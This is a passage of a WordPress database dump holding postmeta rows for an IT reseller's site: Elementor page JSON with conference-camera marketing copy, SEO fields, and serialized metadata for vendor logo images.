spots.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d25c98d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78aa81c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b222883\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9aa57d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b3f5c25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1>Inclusive<\\/h1><h2>Unique, real-time video stitching for a natural 180\\u00b0 view<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"07342a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"47405be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enhance your huddle room with Panoramic 4K video. The Jabra PanaCast uses three 13-megapixel cameras and patented real-time video stitching to give a full 180\\u00b0 view of the room. Enjoy a natural, human perspective, with no blind spots.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"456085f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f657992\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e4b992a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1>Contact sales<\\/h1><h4>Our team of product experts can help you find the best solution for your company. Get instant pricing and advice for your specific environment and use. Fill out the form and a BINTARA representative will contact you.<\\/h4><div>[maxbutton id=\\\"1\\\" text=\\\"Contact Sales\\\" ]<\\/div><div>\\u00a0<\\/div>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8694,1370,'swift-performance','a:0:{}'),(6447,3087,'_wp_page_template','template-fullwidth.php'),(6452,3087,'_elementor_edit_mode','builder'),(6455,3088,'_edit_lock','1572310923:1'),(6456,3088,'_edit_last','1'),(6457,3088,'_wp_page_template','default'),(6473,3088,'_aioseop_title','Dell Large Displays '),(6472,3088,'_aioseop_description','Experience smarter, faster collaboration in meeting rooms or classrooms with Dell Large Format.'),(6462,3088,'_hide_page_title',''),(6463,3088,'_hide_header',''),(6464,3088,'_hide_footer',''),(6465,3088,'_hide_breadcrumb',''),(6466,3088,'_cover',''),(6467,3088,'_show_excerpt',''),(6468,3088,'_wc_apply_product',''),(6469,3088,'_yoast_wpseo_focuskw','Dell Large Displays'),(6470,3088,'_yoast_wpseo_linkdex','38'),(6471,3088,'_yoast_wpseo_content_score','30'),(6474,3091,'_elementor_edit_mode','builder'),(6475,3091,'_elementor_template_type','post'),(6476,3092,'_elementor_edit_mode','builder'),(6477,3092,'_elementor_template_type','post'),(6478,3091,'_elementor_version','2.5.14'),(6479,3091,'_edit_lock','1568348718:1'),(6480,3093,'_elementor_edit_mode','builder'),(6481,3093,'_elementor_template_type','post'),(6482,3094,'_elementor_edit_mode','builder'),(6483,3094,'_elementor_template_type','post'),(6484,3093,'_elementor_version','2.5.14'),(6485,3093,'_edit_lock','1568350674:1'),(8692,3669,'_yoast_wpseo_content_score','60'),(8693,1370,'_elementor_controls_usage','a:0:{}'),(6487,6,'_elementor_edit_mode','builder'),(6488,6,'_elementor_template_type','post'),(6489,6,'_elementor_version','2.5.14'),(8210,1,'_yoast_wpseo_metadesc','Logitech Rally a modular conference cam with 4K Ultra-HD video, modular audio components, PTZ capabilities and RightSense technology from Logitech.'),(8219,2048,'swift-performance','a:0:{}'),(6497,1287,'_yoast_wpseo_content_score','60'),(6539,3221,'_wp_attachment_image_alt','Veeam'),(6538,3221,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:24:\"2018/12/Artboard-11x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-11x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-11x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-11x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Artboard-11x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Artboard-11x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Artboard-11x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Artboard-11x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Artboard-11x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6537,3221,'_wp_attached_file','2018/12/Artboard-11x.png'),(6535,3220,'_wp_attachment_image_alt','Honeywell'),(6536,2073,'_thumbnail_id','3220'),(6533,3220,'_wp_attached_file','2018/12/Artboard-211x.png'),(6534,3220,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:25:\"2018/12/Artboard-211x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Artboard-211x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Artboard-211x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Artboard-211x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Artboard-211x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Artboard-211x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Artboard-211x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Artboard-211x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Artboard-211x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6586,3237,'_wp_attached_file','2018/12/Artboard-31x.png'),(6587,3237,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:24:\"2018/12/Artboard-31x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-31x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-31x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-31x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Artboard-31x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Artboard-31x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Artboard-31x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Artboard-31x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Artboard-31x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6585,3235,'_wp_attachment_image_alt','Solarwinds'),(6543,3223,'_wp_attached_file','2018/12/Artboard-41x.png'),(6544,3223,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:24:\"2018/12/Artboard-41x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-41x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-41x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-41x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Artboard-41x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Artboard-41x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Artboard-41x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Artboard-41x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Artboard-41x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6545,3223,'_wp_attachment_image_alt','Ruckus'),(6546,3224,'_wp_attached_file','2018/12/Artboard-61x.png'),(6547,3224,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:24:\"2018/12/Artboard-61x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-61x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-61x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-61x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Artboard-61x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Artboard-61x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Artboard-61x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Artboard-61x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Artboard-61x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6548,3224,'_wp_attachment_image_alt','Redhat'),(6549,3225,'_wp_attached_file','2018/12/Artboard-111x.png'),(6550,3225,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:25:\"2018/12/Artboard-111x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Artboard-111x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Artboard-111x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Artboard-111x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Artboard-111x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Artboard-111x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Artboard-111x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Artboard-111x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Artboard-111x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6551,3225,'_wp_attachment_image_alt','Qnap'),(6552,3226,'_wp_attached_file','2018/12/Artboard-51x.png'),(6553,3226,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:24:\"2018/12/Artboard-51x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-51x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-51x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-51x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Artboard-51x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Artboard-51x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Artboard-51x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Artboard-51x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Artboard-51x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6554,3226,'_wp_attachment_image_alt','Benq'),(6555,3227,'_wp_attached_file','2018/12/Artboard-81x.png'),(6556,3227,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:24:\"2018/12/Artboard-81x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-81x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-81x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-81x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Artboard-81x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Artboard-81x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Artboard-81x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Artboard-81x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Artboard-81x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6557,3227,'_wp_attachment_image_alt','Cisco'),(6558,3228,'_wp_attached_file','2018/12/Artboard-131x.png'),(6559,3228,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:25:\"2018/12/Artboard-131x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Artboard-131x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Artboard-131x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Artboard-131x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Artboard-131x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Artboard-131x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Artboard-131x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Artboard-131x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Artboard-131x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6560,3228,'_wp_attachment_image_alt','Anydesk'),(6561,3229,'_wp_attached_file','2018/12/Artboard-141x.png'),(6562,3229,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:25:\"2018/12/Artboard-141x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Artboard-141x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Artboard-141x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Artboard-141x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Artboard-141x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Artboard-141x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Artboard-141x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Artboard-141x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Artboard-141x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6563,3229,'_wp_attachment_image_alt','Coreldraw'),(6564,3230,'_wp_attached_file','2018/12/Artboard-101x.png'),(6565,3230,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:25:\"2018/12/Artboard-101x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Artboard-101x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Artboard-101x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Artboard-101x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Artboard-101x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Artboard-101x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Artboard-101x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Artboard-101x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Artboard-101x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";